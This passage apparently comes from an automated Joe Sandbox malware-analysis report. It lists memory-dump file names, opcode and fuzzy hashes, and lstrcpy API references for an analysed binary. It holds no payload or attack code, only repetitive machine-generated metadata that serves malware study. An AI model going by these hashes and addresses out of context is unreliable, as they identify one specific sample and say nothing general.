                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: a6064c7cc904e1e4600ff63448285b092cc40db9da497c31f050ee0e27b8e6a3
                                    • Instruction ID: 08ab8f4f19fb8836bcd4f35a4874615376191f2ddce6aa1e93c887ad906ac74e
                                    • Opcode Fuzzy Hash: a6064c7cc904e1e4600ff63448285b092cc40db9da497c31f050ee0e27b8e6a3
                                    • Instruction Fuzzy Hash: E231D674A01F029FC764DF7AD588992BBF5BF49700B00492EA896C7B50DB30F851CB80
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 000C15A1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C15D9
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C1611
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C1649
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 37e6a00466467951c877dfa0bd6dbf9b5e62351ba81a7632028716b2a36d8945
                                    • Instruction ID: 390b1f3dafa216645d62138a05e8e8e355a7d694ae59e2d0f65339ab5bfcc74d
                                    • Opcode Fuzzy Hash: 37e6a00466467951c877dfa0bd6dbf9b5e62351ba81a7632028716b2a36d8945
                                    • Instruction Fuzzy Hash: B9211974601B029FDB64DF6AD458F5BB7F4AF46700B044A2DA49AC7A42EB30F841CB90
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 000A162D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A164F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1671
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1693
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                     • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 50524da7761b829517fb13d7a7d46ffc36d1786b03056b0820377124b2f2fa34
                                    • Instruction ID: 991d45ba5077794bdd06f66099ca35f84fa2be900413420c5c6c058b75870d72
                                    • Opcode Fuzzy Hash: 50524da7761b829517fb13d7a7d46ffc36d1786b03056b0820377124b2f2fa34
                                    • Instruction Fuzzy Hash: 9F110074A12B039BDB64DFB9D45C967B7F9FF46701B08452DA49AC7A40EB30E841CB90